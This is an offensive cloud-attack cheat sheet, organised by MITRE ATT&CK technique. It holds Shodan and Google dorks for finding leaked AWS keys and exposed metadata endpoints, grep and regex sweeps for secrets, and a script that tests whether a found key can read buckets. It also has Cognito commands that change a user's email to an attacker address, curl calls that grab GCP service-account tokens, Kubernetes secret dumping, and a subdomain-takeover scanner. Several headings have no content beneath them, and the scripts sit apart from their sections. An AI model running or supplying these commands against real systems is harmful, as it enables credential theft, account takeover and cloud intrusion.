Shodan.io query to enumerate AWS Instance Metadata Service Access
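One illustrative Shodan filter for this. The `http.html:` filter is real Shodan syntax; the exact search strings are assumptions, chosen to surface proxies and web apps whose responses embed IMDS paths:

```
http.html:"169.254.169.254/latest/meta-data"
"169.254.169.254" port:80,8080
```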
Google Dorking for AWS Access Keys
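A couple of illustrative dorks; the operators are standard Google syntax, and the exact strings are common examples rather than a definitive list:

```
filetype:env "AWS_ACCESS_KEY_ID"
"aws_access_key_id" ext:txt | ext:log | ext:cfg
```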
Recursively searching for AWS Access Keys on *Nix containers
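A minimal sketch of the recursive search. `SEARCH_DIR` is a placeholder scope; on a target you might sweep `/home`, `/etc`, `/var`, or the container root:

```shell
# Hunt for AWS access key IDs (AKIA + 16 uppercase alphanumerics) and for
# secret-key assignments. "|| true" keeps the pipeline going when a sweep
# finds nothing (grep exits non-zero on no match).
SEARCH_DIR="${SEARCH_DIR:-.}"
grep -rInE 'AKIA[0-9A-Z]{16}' "$SEARCH_DIR" 2>/dev/null || true
grep -rIinE 'aws_secret_access_key[[:space:]]*[=:]' "$SEARCH_DIR" 2>/dev/null || true
```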
S3 Log Google Dorking
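Illustrative dorks for exposed S3-hosted logs (the `site:`/`ext:` operators are standard; the exact combinations are examples):

```
site:s3.amazonaws.com ext:log
site:s3.amazonaws.com inurl:"access.log" | inurl:"error.log"
```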
Public Redshift Cluster Enumeration
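With valid credentials, publicly accessible clusters can be listed with the AWS CLI; the JMESPath filter below is one way to do it (cluster names in the output are whatever exists in the account):

```shell
aws redshift describe-clusters \
  --query 'Clusters[?PubliclyAccessible==`true`].[ClusterIdentifier,Endpoint.Address,Endpoint.Port]' \
  --output table
```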
Python code to check if AWS key has permissions to read s3 buckets:
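A hedged sketch using boto3 (assumed installed); the bucket name and credentials are placeholders, and the helper imports boto3 lazily so it can be defined without it:

```python
# Sketch: return True if the given key pair can list objects in `bucket`.
def can_read_bucket(access_key, secret_key, bucket):
    import boto3  # imported lazily; an assumption that boto3 is available
    from botocore.exceptions import ClientError
    s3 = boto3.client(
        "s3",
        aws_access_key_id=access_key,
        aws_secret_access_key=secret_key,
    )
    try:
        s3.list_objects_v2(Bucket=bucket, MaxKeys=1)
        return True
    except ClientError as err:
        # e.g. AccessDenied, InvalidAccessKeyId, NoSuchBucket
        print(err.response["Error"]["Code"])
        return False

# Example usage (placeholders):
# print(can_read_bucket("<access-key-id>", "<secret-access-key>", "<bucket>"))
```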
Find S3 Buckets Using Subfinder and HTTPX Tool
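A sketch of the pipeline, assuming ProjectDiscovery's subfinder and httpx are installed; the domain and candidate list are placeholders:

```shell
# Enumerate subdomains and probe them, noting titles/redirects that
# indicate S3-backed hosts
subfinder -d example.com -silent | httpx -silent -status-code -title -location

# Probe candidate bucket hostnames directly for S3 error signatures
httpx -l candidates.txt -silent -status-code -match-string "NoSuchBucket"
```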
Cognito (T1087.004)
[!NOTE] Before proceeding, capture the session's JWT during login and save it to a file (e.g., access_token.txt). This can be done using your browser's developer tools or another method.
Get user information:
Test admin authentication:
List user groups:
Attempt sign up:
Modify attributes:
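The steps above can be sketched with the AWS CLI's cognito-idp commands; pool IDs, client IDs, usernames, and the attacker email are placeholders:

```shell
# Get user information from the captured access token
aws cognito-idp get-user --access-token "$(cat access_token.txt)"

# Test admin authentication (requires credentials permitted to call admin APIs)
aws cognito-idp admin-initiate-auth --user-pool-id <pool-id> --client-id <client-id> \
  --auth-flow ADMIN_NO_SRP_AUTH --auth-parameters USERNAME=<user>,PASSWORD=<password>

# List the user's groups
aws cognito-idp admin-list-groups-for-user --user-pool-id <pool-id> --username <user>

# Attempt self sign-up (tests whether the pool allows open registration)
aws cognito-idp sign-up --client-id <client-id> --username <user> --password <password>

# Modify attributes on the current user (e.g., change the email)
aws cognito-idp update-user-attributes --access-token "$(cat access_token.txt)" \
  --user-attributes Name=email,Value=attacker@example.com
```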
AWS Trivy Scanning (T1595.002)
Install the Trivy AWS plugin: trivy plugin install github.com/aquasecurity/trivy-aws
Scan a full AWS account (all supported services):
Scan a specific service:
Show results for a specific AWS resource:
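The three scan modes above look like this with the plugin installed (region, service, and ARN are placeholders; flags per the trivy-aws docs):

```shell
# Scan the whole account (results are cached and reused on later runs)
trivy aws --region us-east-1

# Scan a single service
trivy aws --region us-east-1 --service s3

# Show results for one resource
trivy aws --region us-east-1 --service s3 --arn arn:aws:s3:::example-bucket
```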
SSM (T1021.007)
Script to quickly enumerate and select AWS SSM-managed EC2 instances via fzf, then start an SSM session without needing SSH or public access.
Parameter Store:
Lists the parameters in the AWS account or the parameters shared with the authenticated user (secrets can be stored here):
API Gateway (T1190)
AWS API Gateway is an AWS service for creating, publishing, and managing APIs at scale. It acts as the entry point to an application, letting developers define the rules and procedures that govern which data and functionality external users can access.
Enumeration:
GCP (T1087.004)
Enumerate IP addresses:
SSRF URL:
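The GCP metadata endpoint requires the `Metadata-Flavor: Google` header, so an SSRF must allow header injection (or hit the legacy v1beta1 endpoint). From a foothold, the equivalent curl calls are:

```shell
# Dump all instance metadata
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/?recursive=true"

# Grab a service-account access token
curl -H "Metadata-Flavor: Google" \
  "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"
```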
Cloud Subdomain Takeover (T1584.001)
Kubernetes Secrets Harvesting (T1552.007)
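A sketch of harvesting with kubectl; the secret and namespace names are placeholders, and jq (1.6+) is assumed for the base64 decode:

```shell
# List secrets across all namespaces
kubectl get secrets -A

# Dump one secret and decode every data field
kubectl get secret <secret-name> -n <namespace> -o json \
  | jq -r '.data | map_values(@base64d)'
```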
Kubernetes Service Enumeration (T1046)
You can find everything exposed to the public with:
Kubernetes Ninja Commands (T1609)
Password Hunting Regex (T1552)
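A starter pattern list plus a grep sweep over it. The patterns are common, well-known formats (AWS key IDs, private key headers, GitHub/Slack/Google tokens), not an exhaustive set; `SEARCH_DIR` is a placeholder scope:

```shell
# Write an illustrative secret-hunting pattern list, then grep with it
# case-insensitively across the target directory.
cat > patterns.txt <<'EOF'
AKIA[0-9A-Z]{16}
-----BEGIN [A-Z ]*PRIVATE KEY-----
(password|passwd|pwd)[[:space:]]*[=:]
(secret|token|api[_-]?key)[[:space:]]*[=:]
ghp_[A-Za-z0-9]{36}
xox[baprs]-[A-Za-z0-9-]+
AIza[0-9A-Za-z_-]{35}
EOF
grep -rIinE -f patterns.txt "${SEARCH_DIR:-.}" 2>/dev/null || true
```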
Go Environment Variable Enumeration (T1082)
A sample script that enumerates environment variables. This script pairs well with the regex list provided above:
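A minimal Go sketch of such a script. The secret-name pattern baked in here is an illustrative subset of the kind of regex list mentioned above:

```go
// Enumerate environment variables and flag names that commonly hold secrets.
package main

import (
	"fmt"
	"os"
	"regexp"
	"strings"
)

// Illustrative pattern; extend with the regex list above as needed.
var secretPattern = regexp.MustCompile(`(?i)(secret|token|passw(or)?d|api[_-]?key|access[_-]?key)`)

// looksLikeSecret reports whether a variable name matches a secret pattern.
func looksLikeSecret(name string) bool {
	return secretPattern.MatchString(name)
}

func main() {
	for _, kv := range os.Environ() {
		parts := strings.SplitN(kv, "=", 2)
		if looksLikeSecret(parts[0]) {
			// Print flagged variables with their values
			fmt.Printf("[!] %s=%s\n", parts[0], parts[1])
		} else {
			fmt.Println(parts[0])
		}
	}
}
```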
Jira (T1087)
Privileges
In Jira, privileges can be checked by any user, authenticated or not, through the /rest/api/2/mypermissions or /rest/api/3/mypermissions endpoints, which reveal the current user's privileges.
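A quick unauthenticated check, with jq filtering for granted permissions (host is a placeholder; newer Jira Cloud versions may require a `permissions=` query parameter listing which permissions to check):

```shell
curl -s "https://<jira-host>/rest/api/2/mypermissions" \
  | jq '.permissions | with_entries(select(.value.havePermission == true))'
```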
Pentesting Kafka (T1046)
Use Nmap to detect Kafka brokers and check for open ports:
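A sketch of the scan, plus a metadata pull with kcat (kafkacat) if a broker is reachable; targets are placeholders:

```shell
# Kafka brokers commonly listen on 9092 (PLAINTEXT) and 9093 (SSL)
nmap -p 9092,9093 -sV --open <target-range>

# Pull cluster metadata (topics, brokers, partitions) from an open broker
kcat -b <target>:9092 -L
```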
Azure CLI login and enumeration for privilege escalation:
# Login
$ az login -u <user> -p <password>
# Set Account Subscription
$ az account set --subscription "Pay-As-You-Go"
# Enumeration for Priv Esc
$ az ad user list -o table
$ az role assignment list -o table
#!/bin/zsh
function main() {
    if ! command -v fzf >/dev/null || ! command -v aws >/dev/null; then
        echo "This function requires 'aws' CLI and 'fzf' to be installed." >&2
        return 1
    fi

    echo "Fetching SSM instances..."
    local instances
    instances=$(aws ssm describe-instance-information \
        --query "InstanceInformationList[*].[InstanceId,ComputerName]" \
        --output text)
    if [[ -z "$instances" ]]; then
        echo "No SSM-managed instances found." >&2
        return 1
    fi

    # Extract instance IDs
    local ids=()
    while read -r id _; do
        ids+=("$id")
    done <<< "$instances"

    # Get Name tags for all instance IDs
    local name_data
    name_data=$(aws ec2 describe-instances \
        --instance-ids "${ids[@]}" \
        --query "Reservations[].Instances[].{InstanceId:InstanceId, Name:(Tags[?Key=='Name']|[0].Value)}" \
        --output text)
    declare -A name_map
    while read -r id name; do
        name_map["$id"]="${name:-N/A}"
    done <<< "$name_data"

    # Combine data with aligned formatting (columns: Name, InstanceId, Hostname)
    local enriched
    enriched=$(while read -r id hostname; do
        name="${name_map[$id]:-N/A}"
        printf "%-30s %-20s %-30s\n" "$name" "$id" "$hostname"
    done <<< "$instances")

    # Dynamically size the fzf selection window based on the number of instances
    local line_count
    line_count=$(echo "$enriched" | wc -l)
    local height
    if (( line_count < 10 )); then
        height=30
    elif (( line_count < 20 )); then
        height=50
    else
        height=80
    fi

    local selected instance_id
    selected=$(echo "$enriched" | fzf --header="Select an instance to connect via SSM" --height="${height}%" --reverse)
    instance_id=$(awk '{print $2}' <<< "$selected")
    if [[ -n "$instance_id" ]]; then
        echo "Starting SSM session to $instance_id..." >&2
        aws ssm start-session --target "$instance_id"
    else
        echo "No instance selected." >&2
        return 1
    fi
}
main
aws ssm describe-parameters
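Once parameter names are known, individual values can be pulled; the parameter name is a placeholder, and the `--shared` flag requires a recent AWS CLI version:

```shell
# Retrieve a parameter's value, decrypting SecureString values if permitted
aws ssm get-parameter --name <parameter-name> --with-decryption

# Also check parameters shared from other accounts (recent CLI versions)
aws ssm describe-parameters --shared
```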
# Generic info
aws apigatewayv2 get-domain-names
aws apigatewayv2 get-domain-name --domain-name <name>
aws apigatewayv2 get-vpc-links
# Enumerate APIs
aws apigatewayv2 get-apis # This will also show the resource policy (if any)
aws apigatewayv2 get-api --api-id <id>
## Get all the info from an api at once
aws apigatewayv2 export-api --api-id <id> --output-type YAML --specification OAS30 /tmp/api.yaml
## Get stages
aws apigatewayv2 get-stages --api-id <id>
## Get routes
aws apigatewayv2 get-routes --api-id <id>
aws apigatewayv2 get-route --api-id <id> --route-id <route-id>
## Get deployments
aws apigatewayv2 get-deployments --api-id <id>
aws apigatewayv2 get-deployment --api-id <id> --deployment-id <dep-id>
## Get integrations
aws apigatewayv2 get-integrations --api-id <id>
## Get authorizers
aws apigatewayv2 get-authorizers --api-id <id>
aws apigatewayv2 get-authorizer --api-id <id> --authorizer-id <auth-id>
## Get domain mappings
aws apigatewayv2 get-api-mappings --api-id <id> --domain-name <dom-name>
aws apigatewayv2 get-api-mapping --api-id <id> --api-mapping-id <map-id> --domain-name <dom-name>
## Get models
aws apigatewayv2 get-models --api-id <id>
## Call API
https://<api-id>.execute-api.<region>.amazonaws.com/<stage>/<resource>
#!/bin/bash

# Function to list all projects in the organization
list_all_projects() {
    gcloud projects list --format="value(projectId)"
}

# Function to check if a specific API is enabled for a project
is_api_enabled() {
    local project=$1
    local api=$2
    gcloud services list --project="$project" --filter="name:$api" --format="value(name)"
}

# Function to list all instances in a given project
list_instances() {
    local project=$1
    gcloud compute instances list --project="$project" --format="json"
}

# Main function
main() {
    # Create or clear the files that store public IPs
    output_file="public_ips.txt"
    ip_only_file="ip_addresses.txt"
    : > "$output_file"
    : > "$ip_only_file"

    # Get the list of all projects
    projects=$(list_all_projects)
    for project in $projects; do
        echo "Processing Project: $project"

        # Check if Resource Manager API is enabled for the project
        if [[ -z "$(is_api_enabled "$project" "cloudresourcemanager.googleapis.com")" ]]; then
            echo "Resource Manager API is not enabled for project $project. Skipping..."
            continue
        fi

        # Check if Compute Engine API is enabled for the project
        if [[ -z "$(is_api_enabled "$project" "compute.googleapis.com")" ]]; then
            echo "Compute Engine API is not enabled for project $project. Skipping..."
            continue
        fi

        # Get the list of all instances in the current project
        instances=$(list_instances "$project")

        # Check if there are any instances
        if [[ "$instances" != "[]" ]]; then
            # Loop through each instance and extract public IPs
            for instance in $(echo "$instances" | jq -r '.[] | @base64'); do
                _jq() {
                    echo "$instance" | base64 --decode | jq -r "$1"
                }
                instance_name=$(_jq '.name')
                zone=$(_jq '.zone' | awk -F/ '{print $NF}')
                # select() drops instances whose access configs have no NAT IP
                public_ips=$(_jq '.networkInterfaces[].accessConfigs[]?.natIP | select(. != null)')

                # Check if there is a public IP and write to the output files
                if [[ -n "$public_ips" ]]; then
                    for ip in $public_ips; do
                        echo "$project,$zone,$instance_name,$ip" >> "$output_file"
                        echo "$ip" >> "$ip_only_file"
                    done
                fi
            done
        fi
    done

    echo "Public IPs have been written to $output_file"
    echo "IP addresses have been written to $ip_only_file"
}

# Execute main function
main
import requests
from bs4 import BeautifulSoup
import dns.resolver
import argparse
from tqdm import tqdm

parser = argparse.ArgumentParser(
    description='Query crt.sh and perform a DNS lookup.')
parser.add_argument('domain', help='The domain to query.')
args = parser.parse_args()

response = requests.get(f"https://crt.sh/?q={args.domain}", timeout=30)
soup = BeautifulSoup(response.text, 'html.parser')
domain_names = sorted({td.text for td in soup.find_all('td') if not td.attrs})

for domain in tqdm(domain_names, desc="Checking for subdomain takeovers"):
    # Skip invalid and wildcard domains
    if '*' in domain or len(domain) > 253 or any(len(label) > 63 for label in domain.split('.')):
        continue
    # Identify cloud services and check for potential subdomain takeovers
    try:
        answers = dns.resolver.resolve(domain, 'CNAME')
        for rdata in answers:
            cname = str(rdata.target)
            try:
                if '.amazonaws.com' in cname:
                    response = requests.get(f"http://{domain}", timeout=10)
                    if response.status_code in [403, 404]:
                        print(f"Potential Amazon S3 bucket for subdomain takeover: {domain}")
                elif '.googleapis.com' in cname:
                    response = requests.get(f"http://{domain}", timeout=10)
                    if response.status_code in [403, 404]:
                        print(f"Potential Google Cloud Storage bucket for subdomain takeover: {domain}")
                elif '.blob.core.windows.net' in cname:
                    response = requests.get(f"http://{domain}", timeout=10)
                    if response.status_code == 404:
                        print(f"Potential Azure blob storage for subdomain takeover: {domain}")
            except requests.RequestException:
                continue
    except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN, dns.resolver.YXDOMAIN, dns.resolver.NoNameservers):
        continue
kubectl get namespace -o custom-columns='NAME:.metadata.name' | grep -v NAME | while IFS='' read -r ns; do
    echo "Namespace: $ns"
    kubectl get service -n "$ns"
    kubectl get ingress -n "$ns"
    echo "=============================================="
    echo ""
    echo ""
done | grep -v "ClusterIP"
# List all pods in the current namespace.
kubectl get pods
# Get detailed information about a pod.
kubectl describe pod <pod-name>
# Create a new pod.
kubectl run <pod-name> --image=<image>
# List all nodes in the cluster.
kubectl get nodes
# Get detailed information about a node.
kubectl describe node <node-name>
# Nodes cannot be created through kubectl; get a shell on an existing node instead.
kubectl debug node/<node-name> -it --image=busybox
# List all services in the cluster.
kubectl get services
# Get detailed information about a service.
kubectl describe service <service-name>
# Create a new service.
kubectl create service clusterip <service-name> --tcp=<port>:<target-port>
# List all secrets in the cluster.
kubectl get secrets
# Get detailed information about a secret.
kubectl describe secret <secret-name>
# Create a new secret.
kubectl create secret generic <secret-name> --from-literal=<key>=<value>